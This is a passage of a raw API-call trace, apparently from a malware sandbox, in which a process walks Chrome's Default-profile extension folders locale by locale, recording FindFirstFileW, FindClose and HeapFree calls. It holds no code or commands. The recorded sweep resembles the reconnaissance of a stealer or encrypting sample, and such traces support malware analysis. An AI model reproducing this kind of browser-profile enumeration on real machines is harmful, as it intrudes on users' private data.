FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.453] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.453] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.454] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.454] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.454] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.454] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.454] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.455] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.455] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.455] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.455] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.455] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.455] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.456] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.456] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.456] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.456] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.456] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.457] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.457] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.457] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.457] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.457] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.457] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.458] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.458] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.458] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.458] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.459] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.459] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.459] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.459] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.460] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.460] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.460] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.460] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.460] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.460] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.461] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.461] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.461] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.461] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.461] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.462] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.462] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.462] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.462] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.462] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.463] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.463] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.463] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.463] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.463] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.463] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.464] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.464] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.464] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.464] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.464] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.465] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.465] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.465] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.465] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.465] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.465] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.466] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.466] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.466] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.466] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.466] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.467] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.467] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.467] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.467] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.467] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.467] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.468] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.468] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.468] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.468] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.469] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.469] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.469] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.469] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.469] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.469] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.470] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0157.470] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0157.470] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0157.470] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0157.470] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0157.470] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0157.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32ca8 [0157.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32c68 [0157.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.471] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.471] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.471] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.471] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.472] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.472] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.472] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.474] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.474] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.474] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 